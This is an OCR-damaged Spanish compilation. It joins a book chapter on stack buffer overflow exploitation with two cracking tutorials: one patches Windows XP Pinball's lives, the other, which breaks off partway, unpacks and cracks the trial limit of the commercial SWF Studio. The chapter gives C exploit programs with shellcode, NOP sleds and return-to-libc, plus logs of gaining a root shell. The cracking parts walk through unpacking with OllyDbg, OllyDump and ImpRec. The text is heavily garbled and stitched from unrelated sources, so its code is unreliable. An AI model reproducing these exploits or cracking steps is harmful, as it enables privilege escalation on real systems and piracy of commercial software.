“AXEAxEAxfAx2ZAx6OA6Nx6eAx2NX TAX Ó68 >; 


unsigned long find_start(void) [ 
__asm__(“movl %esp,%eax”); 


) 


int main(int argc, char *argv[]) 
( 
char *buff, *ptr; 
long *addr_ptr, addr; 
int offset=offset_size, bsize=buffer_ size; 
int 1; 


1f (argc > 1) bsize =atoi(argv[1]); 
1f (argc > 2) offset = atoi(argv[2]); 


addr = find_start() - offset; 
printf(“Attempting address: 0x%x1n”, addr); 


ptr = buff; 

addr_ptr = (long *) ptr; 

for (1= 0; i < bsize; 14+=4) 
*(addr_ptr++) = addr; 


ptr += 4; 


for (1= 0; 1 < strlen(sc); 14++) 
*(ptr++) = se[1]; 


buff[bsize - 1] = M0”; 


memcpy(buff,”BUF=”,4); 
putenv(buff); 
system(*/bin/bash”); 

) 


Para explotar el programa, genere el shellcode con la dirección de retorno y entonces 
ejecute el programa vulnerable utilizando la salida generada por el programa del 
shellcode. Asumiendo que no hacemos trampa, no tenemos nada para conocer el offset 
correcto, así que tendremos que probar repetidamente hasta que consigamos colocar el 
shell: 


[jack OOday local]$ ./attack 500 
Using address: Oxbfffd768 


[jack OOday local]$ ./victim $BUF 
Bien, nada sucedió. Eso se debe a que no construimos un Offset lo bastante grande 
(recuerde, nuestro array es de 512 bytes ): 


[jack EOday local]$ ./attack 800 
Using address: Oxbfffe7c8 

[jack EOday local]$ ./victim $BUF 
Segmentation fault 


¿Qué sucedió aquí? Nos pasamos de la raya, y generamos un offset que era demasiado 
grande: 


[jack EOday local]$ ./attack 550 
Using address: Oxbffff188 

[jack EOday local]$ ./victim $BUF 
Segmentation fault 
[jack OOday local]$ ./attack 575 
Using address: Oxbfffe798 

[jack EOday local]$ ./victim $BUF 
Segmentation fault 
[jack OOday local]$ ./attack 590 
Using address: Oxbfffe908 

[jack EOday local]$ ./victim $BUF 
Illegal instruction 


Este tiene buena apariencia para creer que es el offset correcto. Quizá tendremos buena 
suerte con este intento: 


[jack EOday local]$ ./attack 595 
Using address: Oxbfffe971 

[jack EOday local]$ ./victim $BUF 
Illegal instruction 
[jack EOday local]$ ./attack 598 
Using address: Oxbfffe9ea 

[jack EOday local]$ ./victim $BUF 
Illegal instruction 
[jack EOday local]$ ./exploit1 600 

Using address: Oxbfffea04 

[jack EOday local]$ ./hole $B UF 

sh-2.05b+ id 

uid=0(root) gid=0(root) groups=0(root), 10(wheel) 
sh-2.05b+ 


¡Bien¡, supusimos que era el offset correcto y se ha colocado el root shell. En realidad 
aquí está la prueba, con lo que hemos mostrado aquí ( para ser honrados, hicimos en 
poco de trampa ), pero se ha hecho para recortar espacio. 


CUIDADO Hemos corrido este código en un Red Hat 9.0 box. Sus resultados pueden 
ser distintos dependiendo de la distribución, la versión, y muchos otros factores. 


Explotar programas así puede ser tedioso. Debemos continuar suponiendo cual es el 
offset, y a veces, cuando suponemos que es incorrecto, el programa rompe. Eso no es un 
problema para un programa pequeño como este, pero comenzar de nuevo una aplicación 
más grande puede tomar tiempo y esfuerzo. En la próxima sección, examinaremos una 
forma mejor de usar los offsets. 


El método NOP 


Determinar el offset correcto manualmente puede ser difícil. ¿Qué ocurriría si fuera 
posible que existiera más de un offset como objetivo? ¿Qué ocurriría si pudiéramos 
diseñar nuestro shellcode de modo que muchos offsets distintos nos permitieran tomar 
el control de la ejecución? ¿Haría esto al proceso más eficiente y consumir menos 
tiempo, veamoslo? 

Podemos utilizar una técnica llamada el método del NOP para aumentar el número de 
offsets potenciales. Ninguna operación (NOP) es la instrucción que demora la 
ejecución por un período de tiempo. Los NOP se usan principalmente en ensamblado 
para fijar tiempos en situaciones puntuales, o en nuestro caso, para crear una sección 
relativamente grande de instrucciones que no hacen nada. Para nuestros propósitos, 
llenaremos el inicio de nuestro shellcode con NOP. Si en nuestro “espacio” de offset en 
cualquier parte de esta sección de NOP, colocáramos nuestro shellcode el código lo 
ejecutará finalmente después de que el procesador haya ejecutado todas las no 
instrucciones NOP. Ahora, nuestro offset sólo tiene que apuntar a algún lugar de este 
campo grande de nop, con lo cual no tenemos que suponer el offset exacto. Este proceso 
es llamado como relleno con NOP, o creando un NOP pad o NOP sled. Oirá estos 
términos una y otra vez si profundiza su estudio del hacking. 

Reescribimos nuestro programa de ataque para generar los famosos NOP de relleno 
previo para añadir a nuestro shellcode y el offset. La instrucción que significa un NOP 
en los chipsets de 1A32 es 0x90. Hay muchas otras instrucciones y combinaciones 

de instrucciones que pueden normalmente crear un efecto similar de NOP, pero no 
explicaremos esto en este capítulo. 


Hinclude <stdlib.h> 


ttdefine DEFAULT_OFFSET 0 
ttdefine DEFAULT_BUFFER_SIZE 512 
ttdefine NOP 0x90 
char shellcode[] = 


Axeblxlalx5eix3 1xcOx88S1x4601xONX8BANx 18M CAOBA 8 NX 467” 
AXOAXbOxODIx8BMXEBAX8 AA ACAxOSAX BAS O AO ACB xe 8 xe 1? 
AXEAxEAxfEAx2AxOAx6ON 6x2 NX 7368”; 


unsigned long get_sp(void) ( 
__asm__(“movl %esp,%eax”); 


) 


void main(int argc, char *argv[]) 


( 


char *buff, *ptr; 

long *addr_ptr, addr; 

int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; 
int 1; 


1f (argc > 1) bsize = atoi(argv[1]); 
1f (argc > 2) offset = atoi(argv[2]); 


1f (I(buff = malloc(bsize))) ( 
printf(“Can't allocate memory.n”); 
exit(0); 

) 

addr = get_sp() - offset; 

printf(“Using address: 0x%x1n”, addr); 


ptr = buff; 

addr_ptr = (long *) ptr; 
for (1= 0; 1 < bsize; 1+=4) 
*(addr_ptr++) = addr; 


for (i=0; i < bsize/2; i++) 
buff[i] = NOP; 


ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); 
for (1 = 0; 1 < strlen(shellcode); 14+) 
*(ptr++) = shellcode[1]; 


buff[bsize - 1] = M0”; 


memcpy(buff,”BUF=”,4); 
putenv(buff); 
system(“/bin/bash”); 

j 


Ejecutemos el nuevo programa otra vez con el mismo código objetivo y veamos que 
ocurre: 

[jack Oday local]$ ./nopattack 600 

Using address: Oxbfffdd68 

[jack EOday local]$ ./victim $BUF 

sh-2.05b+ id 

uid=0(root) gid=0(root) groups=0(root), 10(wheel) 

sh-2.05b+ 


Bien, sabíamos que el Offset funcionaría, probemos con otros: 


[jack OOday local]$ ./nopattack 590 

Using address: Oxbffff368 

[jack EOday local]$ ./victim $BUF 

sh-2.05b+* id 

uid=0(root) gid=0(root) groups=0(root), 10(wheel) 


sh-2.05b* 
Caemos en el relleno de NOP, y funciona perfectamente. ¿Cuán lejos podemos ir? 


[jack OOday local]$ ./nopattack 585 

Using address: Oxbffff1d8 

[jack EOday local]$ ./victim $BUF 

sh-2.05b+ id 

uid=0(root) gid=0(root) groups=0(root), 10(wheel) 
sh-2.05b+ 


Podemos ver que con sólo este ejemplo simple tenemos de 15 a 25 posibles objetivos 
más que sin el relleno de NOP. 


Derrotar un “stack” que no se ejecuta. 


La explotación anterior funciona debido a que podemos ejecutar las instrucciones 
almacenadas en el “stack”. Como protección contra esto, muchos sistemas operativos 
tales como Solaris y OpenBSD no permiten programas que ejecuten código del stack. 
Como puede haber supuesto ya, necesariamente no tenemos que ejecutar código en el 
“stack”. Ello es simplemente un buen, mejor conocido, y más confiable método de 
explotar programas. Cuando encuentre una pila no ejecutable, se puede usar un método 
de explotación conocido como “Return to libc”. Esencialmente, haremos uso de la 
librería popular y siempre presente “libc”, para exportar nuestras llamadas de sistema a 
dicha librería. Esto hará posible la explotación cuando el “stack” del objetivo esté 
protegida. 


Return to libc 


¿Cómo trabaja en realidad “Return to libc”? Desde un privilegio alto, asuma para 
simplificar, que tenemos ya el control de EIP. Podemos poner cualquiera dirección que 
nosotros deseemos para que se ejecute en EIP; en resumen, tenemos el control total de 
la ejecución del programa gracias a algún buffer vulnerable. 

En lugar de retornar el control a las instrucciones en la pila, como en un exploit de 
desbordamiento de buffer de pila tradicional, forzaremos al programa para que retorne a 
una dirección la cual corresponde a una función específica de la librería dinámica. Esta 
función no estará en la pila, significando que podemos circunvenir cualquier restricción 
de ejecución de pila]. Escogeremos cuidadosamente la función de retorno de la librería 
dinámica; lo adecuado sería que cumpliera dos condiciones: 


Debe ser una librería dinámica común, presente en la mayor parte de los programas. 


La función dentro de la librería debería permitir tener mucha flexibilidad como, 
ser posible el colocarle una shell o que haga cualquiera cosa que necesitemos hacer. 


La librería que satisface mejor ambas condiciones es la librería “libc”. Libc es una 
librería estandar de C; contiene en más o menos cada función común de C eso 
presuponemos. Por naturaleza, todas las funciones en la librería están separadas ( según 
la definición de una función de librería ), significando que cualquier programa que 
incluya a libc tendrá acceso a estas funciones. Usted puede preguntarse —si cualquier 


programa puede acceder a estas funciones comunes, ¿por qué no uno de nuestros 
exploits? Lo único que tenemos que hacer es dirigir la ejecución a la dirección de la 
función de la librería que queramos usar ( con los argumentos apropiados a la función, 
por supuesto ), y será ejecutada. 

Para nuestro exploit “return to libc” , simplemente al principio tenemos que colocar la 
shell. La función más fácil de usar de libc para nuestros propósitos en este ejemplo es 
“system()”; lo que hace es tomar un argumento y ejecutar dicho argumento con /bin/sh. 
Así, suplimos system() por /bin/sh como un argumento, y conseguimos una shell. No 
conseguiremos ejecutar código en la pila; pero saltaremos directamente a la dirección de 
la función system() de la librería C. 

Un punto interesante ahora es cómo conseguir el argumento que se pasará a system(). 
Esencialmente, lo que hacemos es pasar un puntero a la string (bin /sh) que deseamos 
ejecutar. Normalmente sabemos cuando un programa ejecuta una función ( en este 
ejemplo, usaremos como nombre “the_function” ), los argumentos pasados son 
empujados a la pila en orden inverso. Este suceso es de nuestro interés el cual nos 
permitirá pasar parámetros a system(). 

En primer lugar, es ejecutada una instrucción CALL a “the_function”. Este CALL 
empujará la dirección de la próxima instrucción, donde queremos retornar, en la pila. 
Disminuirá también a ESP en 4. Cuando retornemos desde “the function”, RET 

Co EIP ) será sacado de la pila. Entonces en ESP es colocada directamente la dirección 
del RET. 

Ahora vamos al retorno real a system(). “the_function” asume que ESP está en este 
momento apuntando a la dirección que debe de ser retornada. También asume que los 
parámetros están quietos y esperando para ello, en la pila, empezando con el primer 
argumento siguiente al RET. Esto es el comportamiento normal de pila. Ponemos el 
retorno a sistema () y el argumento ( en nuestro ejemplo, esto será un puntero a /bin/sh ) 
en esos 8 bytes. Cuando “the_function” retorna, retornará (o saltará, en dependiendo de 
la situación ) a system (), y system () tiene nuestros valores esperando para ello en la 
pila. 

Ahora que usted comprende las bases de la técnica, echemos una mirada al trabajo de 
preparación que debemos realizar a fin de realizar un exploit “return to libc”: 


1. Determine la dirección de system(). 
2. Determine la dirección de /bin/sh. 


3. Encuentre la dirección de “exit()”, así podemos cerrar el programa explotado 
limpiamente. 


La dirección de system() se puede encontrar en libc simplemente desensamblando 
Cualquier programa C o C++. El gcc incluirá por defecto a libc al compilar, así que 
podemos usar el siguiente programa para encontrar la dirección de system(): 
int main () 
( 
) 


Ahora, encontremos la dirección de system() con gdb: 


[rootOday local]* gdb file 
(gdb) break main 


Breakpoint 1 at 0x804832e 
(gdb) run 
Starting program: /usr/local/book/file 


Breakpoint 1, 0x0804832e in main () 

(gdb) p system 

$1 = [<text variable, no debug info>]) 0x4203f2c0 <system> 
(gdb) 


Vemos que la dirección de system() está en 0x4203£2c0. Busquemos también la 
dirección de exit(): 


[rootOday local]* gdb file 

(gdb) break main 

Breakpoint 1 at 0x804832e 

(gdb) run 

Starting program: /usr/local/book/file 


Breakpoint 1, 0x0804832e in main () 

(gdb) p exit 

$1 = (<text variable, no debug info>) 0x42029bb0 <exit> 
(gdb) 


La dirección de exit() se encuentra en 0x420209bb0. Finalmente, para conseguir 

la dirección de /bin/sh podemos usar la herramienta memfetch la puedes encontrar en 
http://lcamtuf.coredump.cx/. memfetch volcará la memoria de un proceso específico; 
simplemente examine los archivos binarios para la dirección de /bin/sh. Como 
alternativa, puede almacenar /bin/sh en una variable de entorno, y entonces tomar la 
dirección de esta variable. 

Finalmente, para hacer nuestro exploit para el programa original —haremos un exploit 
muy simple, corto y bonito. Necesitamos 


1. Llenar el buffer vulnerable hasta la dirección de retorno con datos basura. 
2. Sobrescribir la dirección de retorno con la dirección de system(). 

3. A continuación de system() la dirección de exit(). 

4. Añada la dirección de /bin/sh. 

Hagámoslo con el siguiente código: 


Hinclude <stdlib.h> 


ttdefine offset_size 0 
ttdefine buffer_size 600 
char sc[] = 


“AxcOxP21x031x42” //system() 
“Ax021x9b1xb01x42” //exit() 


Axa0Nx8alxb21x42” //binsh 


unsigned long find_start(void) ( 
__asm__(“movl %esp,%eax”); 


) 


int main(int argc, char *argv[]) 

( 

char *buff, *ptr; 

long *addr_ptr, addr; 

int offset=offset_size, bsize=buffer_ size; 
int 1; 


1f (argc > 1) bsize =atoi(argv[1]); 
1f (argc > 2) offset = atoi(argv[2]); 


addr = find_start() - offset; 
ptr = buff; 

addr_ptr = (long *) ptr; 
for (1= 0; 1 < bsize; 1+=4) 
*(addr_ptr++) = addr; 


ptr += 4; 


for (1= 0; 1 < strlen(sc); 14++) 
*(ptr++) = se[i]; 


buff[bsize - 1] = M0”; 


memcpy(buff,”BUF=”,4); 
putenv(buff); 
system(*/bin/bash”); 

) 


Conclusión 


En este capítulo, aprendió las bases de los desbordamientos de buffers basados en la 
pila. Los desbordamientos de pila se aprovechan de los datos almacenados en la pila. La 
meta es inyectar instrucciones en un buffer y sobrescribir la dirección de retorno. Con la 
dirección de retorno sobrescrita, tendrá el control del flujo de ejecución del programa. 
Desde aquí, inserta el shellcode, o las instrucciones para depositar una root shell, la cual 
es ejecutada. Una gran parte del resto de este libro cubre tópicos más avanzados de 
desbordamientos de pila 


PLibal de WinAdoys 38P 


mayo-2008 


AO SAS > E 


REImmctay 


PINBALL.EXE 


01.05.2008 (día del trabajador) 


“vidas infinitas” o las que queramos 


OIlyDBG 1.10 


Algo sencillo. 
Todo comenzó por una simple tontería: había un joven jugando al pinball de Windows 
XP y se hizo una montruosa puntuación que dijo que nadie sería capaz de superar... 


Yo le dije que cuánto apostaba a que yo podría superarla... y nos apostamos un 
almuerzo (solamente). 

Supongo que él pensaría que me iba a poner a jugar todos los días a mejorar mi 
habilidad... 


Lo que yo ya sabía 
Aunque es una simple apuesta, yo sabía de antemano que el pinball.exe de Windows XP 


no estaba comprimido con nada y probablemente estaría compilado con Visual C++ 6.0. 
Así que en principio podía apostarme un almuerzo (más no.. jeje) 

La idea de todo es intentar tener vidas infinitas (bolas infinitas) o conseguir tener las 
vidas que nosotros queramos. 

Por defecto tiene 3 vidas. 


karmany 


Comprobé con RDG Packer Detector que efectivamente no estaba empacado y que 
estaba compilado con Visual C++: 


RDGiPacker Detector vO.6.5 4 


C:Mrchivos de programa'Windows NTWPinballipinball.exe Abrir 


Microsoft Visual C++ v7.0 Compilador 
Nada Detectado 


Posible XL. 
Contacto : Al Frente [] 


- oo 1 


dd Archivo Escaneado en ,08 Seg. i 1) ] 


Para atacarlo busqué en las strings referencias sin encontrar nada así que abrí el pinball 
en el OIlyDBG y tras caer en el OEP y utilizando las barras de desplazamiento empecé a 
subir por el código y a observar... 


Todo lo primero que encontré fue relacionado con el sonido. Después código difícil de 
digerir ya que había muy pocas funciones y finalmente y SORPRENDENTEMENTE 
me encuentro con la siguiente imagen: 


Interesantísimo: una variable llamada “ballcount1” y vemos como un poco antes pone 
en memoria un 3: 

0I0IABF2— MOV DWORD PTR DS:[ESI+14A],3 

¿Qué pasaría si en vez de 3 pongo 5? 

Pues lo siguiente: 


Jeje. Que ya tengo 5 vidas y no 3. 

Es muy sencillo. A partir de aquí se pueden poner las vidas que uno quiera (creo que el 
máximo podría ser un valor byte: 255). También si ponéis Hbp se llega enseguida al 
lugar donde se quita una vida. 

El único problema que hay es que si nunca se quita una vida el programa tal vez se haga 
infinito... jeje y nunca se acabe... 


Pues en este momento ya estaba preparado para arrebatar el primer puesto al joven, así 
que me puse vidas infinitas y empezé con una mano a pulsar en la *z” y la “'m” que son 
los dos mandos y en la otra mano me puse un café y a dejar pasar el tiempo y... 


Al cabo de una hora estabamos los dos en un bar pagando yo los almuerzos porque 
llevaba más de media hora y no llegué a conseguir ni la 3 parte de su puntuación, así 
que cerré y borré mi programa crackeado y le dije que él había ganado la apuesta... 


Un saludo para todos. 
karmany 


NOMBRE: PARCHEANDO SWF STUDIO 3.6.147 


Programa NorthCode SWF Studio 

Versión 3.6.147 

Herramientas Olly, PEI¡D, RDG Paker Det, ImpRec, VB Decompiler Lite v3.3, 
Masm, WinAsm 5.11 

Objetivo Crackearlo 

Cracker MCKSys Argentina 

Protección MoleBox v2.X.X (Visual Basic en P-Coide) 


Bien, este es mi primer tutorial asi que no esperen mucho!! OY 


Bien, antes que nada: el programa que queremos crackear es el SWF Studio de Northcode. En este caso es 
la versión 3.6.147, es la versión que se encuentra en el mercado actualmente (lanzada el 20-10-2008). 


OK, antes de empezar les cuento un poco del programa: El SWF Studio lo que hace es crear proyectores 
Flash (también protectores de pantalla), osea, transforma los .swf en exe. Pero además te ofrece un montón 
de herramientas que te permiten armar una verdadera aplicación en Flash. 


Bien, el programa de consta de 2 archivo importantes: Studio.exe y Compile.exe. 


Para hacer mas rapidas las cosas, studio.exe es el ejecutable principal del programa, esta hecho en Visual 
Basic 6 y compilado a pseudo-código (P-Code). El archivo Compile.exe (como lo dice su nombre) se 
encarga de “compilar” el proyecto que hemos creado en el SWF Studio y lo transforma a .exe. 

Así que éste es el que vamos a atacar!!! 


El programa puede registrarse también ingresando un código en el formulario O pantalla de registración, 
pero a eso se lo dejo a crackers más experimentados como Solid, Guan de Dio, Guillermo, karmany, etc. 


NOMBRE: PARCHEANDO SWF STUDIO 3.6.147 


Empecemos por el principio: le pasamos PEiD a Compile.exe: 


lelxi 
File: [C:jArchivos de programalNorthcodelStudio36/Compile,exe É] 


Entrypoint: [00049353 DN EP Section: [3 
File Offset: [0001F353 First Bytes: [E8,00,00,00 
Linker Info: [6,0 Subsystem: | Win32 GUI 


[MoleBox v2.0 [Overlay]F 
F Stay on top [>] [E] 


Bien, vemos que está empacado con Molebox y que la versión parece ser la 2.0. Si le paso el RDG tengo: 


RDGPacker Detector vO.6.5 Y 


C:MARCHIV"TANORTHC”14Studio36Compile.exe | Abrir | 


Compilador 
Nada Detectado 


MoleBox Detección Heurística a 
Contacto : Al Frente 


a dd os=e=" Lo 


dd Archivo Escaneado en ,03 Seg. ¿ 30 


PUSHAD 


CMP DH, CH 
M IRD PTR DS: [ESI] 


NOMBRE: PARCHEANDO SWF STUDIO 3.6.147 


Uhmm, esto es un desastre. OK, vamos a proceder de acuerdo a los tutoriales destinados a desempacar 
Molebox. (Recomiendo leerlos puesto que están muy bien detallados, los tutes están en la web de Ricardo). 
Como vemos el Entry Point es un CALL 449358. Si miran bien el destino del CALL es la siguiente 
instrucción, la cual es un PUSHAD. Siguiendo los tutes antes dichos (y asombrosamente usando el plugin 
para desempacar UPX) vamos a saltar CASI directamente al OEP del programa. Hacemos F7 para llegar al 
PUSHAD. Luego usamos el OllyScript con el siguiente script (OEP_PUSHAD_POPAD.OSO): 


/* 
.3[CracksLatinoS]:. 
Script realizado por : Lisa 8£8 Alquimista 
Script para : Para encontrar el OEP en programas con el | 
metodo PUSHAD-POPAD | 
Configuracion: SI el programa tiene expecepciones configurar | 
Olly marcando todas, EXCEPTO invalid or | 
privileged instruction | 
Fecha : 13/06/2005 | 
-=[ Comentario del Script ]=- | 
IT 111 MUY IMPORTANTE VITITUII III VA TISITI1411 | 
Para su correcto funcionaminto es necesario, que el programa | 
este en la instruccion PUSHAD, a partir de hay ejecutar | 
el script. Este script parara una instrucccion despues | 
de la instrucion POPAD. | 
Justo, cuando el compresor ha acabado su tarea de descomprimir | 
Una vaz hay el OEP estara una dos o tres instruciones despues | 
de dond sta detenido el programa | 
*/ 
var punto // Declara la variable punto 
eob encontrado // si hay un break point vete a encontrado 
eve excepci // si hay una excepcion vete a excepci 


mov punto, eip 

sto // pasa una instrucion 

mov punto, esp 

bphws punto, "r" // Pon el BP de acceso en el contenido de esp 
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run // Ejecuta el programa para llegar al BP 

excepci: 

esto // Pasa la excepcion con SHIT+F9 

run // continua ejecuntando el programa para llegar al BP 
encontrado: 

// bphwc punto // Quitamos el hardware breakpoints 

mov punto, eip // poner mensajes en Olly 

cmt punto ,"!! Mira en la ventana LOG !! " 

log " " 

log " " 

A 

log " + .:[CracksLatinoS]:. E" 

log " + Script para encontrar el OEP en programas con el metodo PUSHAD-POPAD pr 

log " + qn 

log " $ script realizado by $8 Lisa £g£ Alquimista para un gran amigo =<<RedHtwK>>= +" 

log " + GRACIAS por usar este script qn 

log " + q 

A 
log" " 

log" " 

1ég on 

log " * 

E dd 
log "+ El proceso de descompresion ha llegado a su fin - 
log "* La instrucion anterior es -> POPAD con lo cual el el paker ha acabado su cometido +" 
log "+ q 
log "+ 1111 El oep esta muy cerca !!!!!!! 4" 
log "+ qn 
log "+ ¡Busca un: JUMP XXXXXXXXX si no lo encuentras qn 
log "+ ¡Busca un: PUSH XXXXXXXXX RET qn 
log "+ q 
log "+ El OEP estara despues del JUMP o del RET ¡e 
log "+ ll 
log "+ $ 
DN dí 
log " " 

log " " 

ret // Salimos del Script 


Bien, una vez ejecutado el script, tenemos algo como: 
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UE Po tt Mira en la ventana LOG ** 
aja! € 


BLABLREABEABRE BLAS Sdj 


Acá estamos en 448F2E (POP EAX). Si hacemos F7 2 veces, llegamos al CALL EAX. Acá, el OEP de 
nuestro programa está en EAX! 
Le damos F7 nuevamente y saltamos a esto: 


DWORD PTR DS: [401054] 


212 BYTE PTR DS 
04154000 
¿EEFFERFF 


DOE 


odu eE 
<Modu l 


DO 


Le damos al botón derecho y seleccionamos “Actualize”. Hacemos esto para que el Olly tenga en cuenta los 
módulos recien cargados (en este caso es la MSVBVM60.DLL, la librería de visual Basic). 
Ahora volvemos al código con Alt+C y tenemos lo siguiente: 


DWORD PTR DS: [401054] 


BYTE PTR DS: 
ADD BYTE PTR DS: 
ADD EYTE PTR DS: 


0 
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Fíjense cómo ha cambiado la cosa. De los tutoriales que hemos leído (si no lo hicieron, deberían, para eso 
están:) reconocemos esto como el EP (Entry Point) de un programa hecho en Visual Basic. Puesto que 
nuestro programa está empacado, este es nuestro OEP (Original Entry Point :) 


OK, ya estamos listos para dumpear este EXE. Usamos el OllyDump y lo configuramos así: 


OllyDump - Compile.exe x] 


Start Address: [400000 Size: [63000 
Entry Point: [48353 > Modify: fi 2CC Get ElP as DEP | Cancel 


Base of Code: [47000 Base of Data: faDoo0 


[4 Fix Raw Size € Offset of Dump Image 


| Section | Virtual Size_ | Virtual Diftset | Raw Size___| Raw Offset 


000387CfE 00001000 000387CfC 00001000 60000040 
00002234 O0O3DO00 00002234 0003D000— E0000080 
00006848 00040000 00006848 00040000 E0000040 
00011870 00047000 00011870 00047000 E0000040 
00001102 00059000 00001102 00059000 ED000040 


0 
1 
2 
3 
4 
5 00007424 — 00058000 00007424 — 0005B000  EDOO0040 


P Rebuild Import 
Methodl : Search JMP[API] | CALL[4PI] in memory image 
O Method2 : Search DLL 2 4PI name string in dumped file 


Noten que el check de “Rebuild Import” está libre. Esto es porque no queremos que el OllyDump arme la 
Import Table, sino que lo va a hacer ImpRec. Le damos a “Dump” y guardamos como CompileDump.exe. 


Abrimos el ImpRec, seleccionamos el compile.exe del combo superior. En OEP ingresamos 12CC. Este es 
el OEP expresado como RVA (Relative Virtual Address ó Dirección Virtual Relativa. Esto es porque es 
RELATIVA al ImageBase del PE Header. Si no estienden nada de esto, les sugieron un tutorial sobre 
formato PE). Bueno, una vez que tenemos todo cargado, le damos a “lAT AutoSearch”, aceptamos el 
mensaje que dice que encontro algo que podría ser la IAT, y le damos a “Get Imports”. Y la cosa queda asi: 
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Y Import REConstructor v1.6 FINAL (C) 2001-2003 MackT/uCcF 


rva:D0001000 mod:msvbwm60. dll ord:02B8 name:rtcCharYalueB str 
rva:D0001004 mod:msvbwm60.dll ord:02B9 name:rtcBstiFromChar Show Suspect 
rva:D00001008 mod:msvbwm60. dll ord:0204 name:rtcánsiValueB str 

- ra:D00001 00€ mod:msvbwm60. dll ord:0205 name:rtcLowerCaseB str 
rva:00001010 mod:msvbwm60. dll ord:0207 name:rtcT rimB str 
rva:D00001014 mod:msvbwm60. dll ord:0229 name:rtcGetYear 
rva:D00001018 mod:msvbwm60. dll ord:0294 name:rtcW'arFromFormatar 
rva:0000101C mod:msvbwym60. dll ord:.0296 name:rtcD ateDiff há! Clear Imports 


Log 
Original l4T RA found at: 000010E 4 in Section RWá;: 00001000 Size: 00038 7CCE 


Show Ina | 
Show Suspec! 
[ tuto Trace | 
lar Impars | 
lAT read successfully. Meza 
pins | 
Em | 


Current imports: 
1 [decimal:1] valid module(s] (added: +1 (decimal: +1 
47 (decimal: 71) imported function(s]. ladded: +47 [decimal: +71]] 


147 Infos needed New Import Infos (ID+4SCI+LOADER] 


DEP [00001 2CC 187 AutoSearch | pArA [00000000 Size [00000612 


Ara 100001000 Size [000001 20 [Y Add new section 


Load Tree | Save Tree| Get Imports [ E [ 


Noten que encontro 71 funciones importadas de msvbvm60.dll y todas son correctas. 

Ahora le damos a “Fix Dump”, seleccionamos el archivo CompileDump.exe que habiamos guardado y 
aceptamos. Por defecto, nos va a crear el archivo CompileDump_.exe. 

De esta forma tenemos nuestro programa en Visual Basic, completamente desempacado O 

Ahora la (mala?) noticia: este programa está compilado en P-Code. ¿ Qué significa esto? Pues que la 
sección de código del programa solamente tiene instrucciones para la librería msvbvm60.dll. Esto quiere 
decir que no vamos a poder tracear por el código como si fuera un programa hecho en C o Delphi. No 
vamos a ver instrucciones en ASM en el código del programa, solamente el código de la librería de VB. 
Maldición!! ¿ Y ahora que hacemos?” 

Bueno, usamos un decompilador de Visual Basic!!! 


Yo he usado el VB Decompiler Lite v3.3. 


Este es un gran decompilador de Visual Basic, tanto para código Nativo como para P-Code. 
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Bien, abrimos el programa dumpeado y reparado con ImpRec y luego de un buen rato, está decompilado: 


84 Ya Decompiler Lite y3.3 MESES] 


“ile “oks Flogns lll 


Hleramz;  [Pastivus de pruy a 12 Nu id S ai FEO pida 1 0 con | Distu 11d | 
Obioco5 Trios anbcrtaco: 
Er EE Frolex "yes 


Reterence-"1LJU_-USJ13U-- UU. -U UU. E UU UL UU UU JUL 16 | FL UEUR ¿Le Yo AULAS SS EMS FUDU_LE +, SLBFULA Loto: 
Mudule=Rey > 1y2 AR - y has 
Module-Lrypto; /Lrvp0.baz 
Midwle= Rites: Xi Tí 
Module--.Kivres; MPLIyp=8.2as 
Midwle=x5 ¡hh 270450 has 
Bodule--Marsta_1: “Maz3all.bas 
Midwle=Tri; XT das 
Module-*Lont1q; /iomt1iq.bas 
Mdule=RITD>> ARTTDS hs 
MBodule-:Uniccdes Xx b1coze.zas 
Minule=%he rg: XI ig Ti 1 
Module-yBu1_c; :Bul_d.bz3 
Middle %e ar iy rr dy hos 
Modwle->5h1n7 23h1m. bas 
Midwle=M.idioyz ZULIL Las 
Module-yWindcv; Uindov. bas 
Pueu=3T mm. fra 

Module-.Kbkzle; (PoMle.bas 
Midule="1 st: 27193 h. hs 
Module-*Ut1_7 M_211,baz 
Middle Fiyi? 1: Tens 
Modwle-":1Le2y87 Xblesye.cas 
Midwle=YToafa: MTuf 1 has 
Module--MinYex; ¿Uinver.baz 
Mdule=YPunpilez Wip Tec 
ModwWe-*Mam; Man, bas 
Midvle=YBni0é: Yui. h-s 


¡ Er 
oi PL Skon 
iy LeerConts=le 


ni ' Studio -onpiler* 

Ye sir ¿Tae = "ii dd e Ta 
Majorver-3 

Mimrier=ó 


Revzalor.er-1:" 
Puma FR = 0% 
HelpLontext_L - “uU* 
Pump ile = “7 
aAuzolncrea=nt er - U 


Sr ver SS o 7 Tes = NM al 
Fx La 


Miecompilad TE 


Acá les recomiendo usar el comando “Save all in one module” del menu “File”. Así van a poder guardar todo 
en un solo archivo y van a poder usar otro editor para ver y analizar el código. Yo les recomiendo UltraEdit- 
32, pero ustedes usen el que quieran. 


Bien, aquí debemos detenernos un poco. Esto es así porque hasta ahora no sabemos que debemos 
crackear. Para hacerlo rápido y fácil les explico: SWFStudio te permite crear un “proyector” flash con todas 
las opciones y características que ofrece el programa, lo único es que la versión NO registrada genera 
proyectores que duran 1 sólo día. Así que, luego de armar un proyecto MINIMO en SWFStudio, si le damos 
a “BUILD”, nos sale lo siguiente: 
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SWF Studio Professional Edition 3.6 - PruebaCatalogo 


hb 2 _ E _yf/ hm 9 $ % y» a q. 


New Open Save Build Options Tips Forums Update Store Unlock Help 


Output | Movie | window | Application | Screensaver | Defaults | Version | Expiry | Plugins | Files | Masks Build | Trace | 


Build Results 


setting script timeout to 15 seconds 
setting recursion depth to 256 calls 
setting splash screen timeout to 1 second(s] 

adding the ActionScript 4Pl 

core version: 8 

added E:*PruebaStudio+PruebaCatalogotcatalogol.swf 

converting trial movie to SWF8 format 

added E:*PruebaStudio+PruebaCatalogotsplash2 ¡pa [compressed by 3%] 

added C:Srchivos de programa Northcode!Studio364 default. ico [compressed by 99%] 

adding plugins and files from layout 

added C:Srchivos de programa Northcode!Studio36+Pluginstcatalog. dll (compressed by 53%] 
added E:*PruebaStudio+PruebaCatalogotcatalogol.txt [compressed by 13%] 


| [WARNING SWF Studio is run 


ning in TRIAL mode, t 


his exe file will expire after one day 


file version 1.0.0.0 
BUILD SUCCESSFUL ve 


Test Options A 


[F Automatically test the output file after a successful build 


Optional command line arguments for the projector 


Test the output file Test... 


Test the screensaver settings dialog 


Settinas... 


Bien, nos dice que la aplicación va a expirar luego de un día. Ahora, vamos al archivo que guardamos con el 
VB Decompiler. Lo abrimos y buscamos la cadena “TRIAL mode” (no ponemos la cadena completa porque 
